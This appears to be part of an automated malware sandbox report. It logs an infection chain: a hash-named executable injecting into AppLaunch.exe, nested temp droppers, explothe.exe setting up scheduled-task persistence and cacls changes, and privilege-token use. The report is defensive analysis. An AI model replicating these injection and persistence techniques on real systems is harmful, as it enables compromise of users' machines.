Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7D1E.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\A463.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3820 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3820 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3820 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3820 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3820 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3820 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3820 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3820 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3820 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3232 wrote to memory of 4696 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7A3C.exe
PID 3232 wrote to memory of 4696 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7A3C.exe
PID 3232 wrote to memory of 4696 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7A3C.exe
PID 3232 wrote to memory of 4884 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7B18.exe
PID 3232 wrote to memory of 4884 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7B18.exe
PID 3232 wrote to memory of 4884 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7B18.exe
PID 3232 wrote to memory of 1408 N/A C:\Windows\Explorer.EXE C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3232 wrote to memory of 1408 N/A C:\Windows\Explorer.EXE C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3232 wrote to memory of 4436 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7CA0.exe
PID 3232 wrote to memory of 4436 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7CA0.exe
PID 3232 wrote to memory of 4436 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7CA0.exe
PID 3232 wrote to memory of 1616 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7D1E.exe
PID 3232 wrote to memory of 1616 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7D1E.exe
PID 3232 wrote to memory of 1616 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7D1E.exe
PID 3232 wrote to memory of 4856 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7DAC.exe
PID 3232 wrote to memory of 4856 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7DAC.exe
PID 3232 wrote to memory of 4856 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7DAC.exe
PID 4696 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\7A3C.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe
PID 4696 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\7A3C.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe
PID 4696 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\7A3C.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe
PID 3232 wrote to memory of 224 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7EB7.exe
PID 3232 wrote to memory of 224 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7EB7.exe
PID 3232 wrote to memory of 224 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7EB7.exe
PID 1408 wrote to memory of 4288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3296 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe
PID 3296 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe
PID 3296 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe
PID 4964 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CM2XZ5rM.exe
PID 4964 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CM2XZ5rM.exe
PID 4964 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CM2XZ5rM.exe
PID 4792 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CM2XZ5rM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gi9EF8It.exe
PID 4792 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CM2XZ5rM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gi9EF8It.exe
PID 4792 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CM2XZ5rM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gi9EF8It.exe
PID 5040 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gi9EF8It.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1JL56KD9.exe
PID 5040 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gi9EF8It.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1JL56KD9.exe
PID 5040 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gi9EF8It.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1JL56KD9.exe
PID 4288 wrote to memory of 3264 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4288 wrote to memory of 3264 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4856 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\7DAC.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 4856 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\7DAC.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 4856 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\7DAC.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3340 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 3340 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 3340 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 3340 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 3340 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 3340 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 4156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 4156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 4156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1408 wrote to memory of 3424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 3424 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4708 wrote to memory of 5080 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4708 wrote to memory of 5080 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe

"C:\Users\Admin\AppData\Local\Temp\1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\7A3C.exe

C:\Users\Admin\AppData\Local\Temp\7A3C.exe

C:\Users\Admin\AppData\Local\Temp\7B18.exe

C:\Users\Admin\AppData\Local\Temp\7B18.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7BE4.bat" "

C:\Users\Admin\AppData\Local\Temp\7CA0.exe

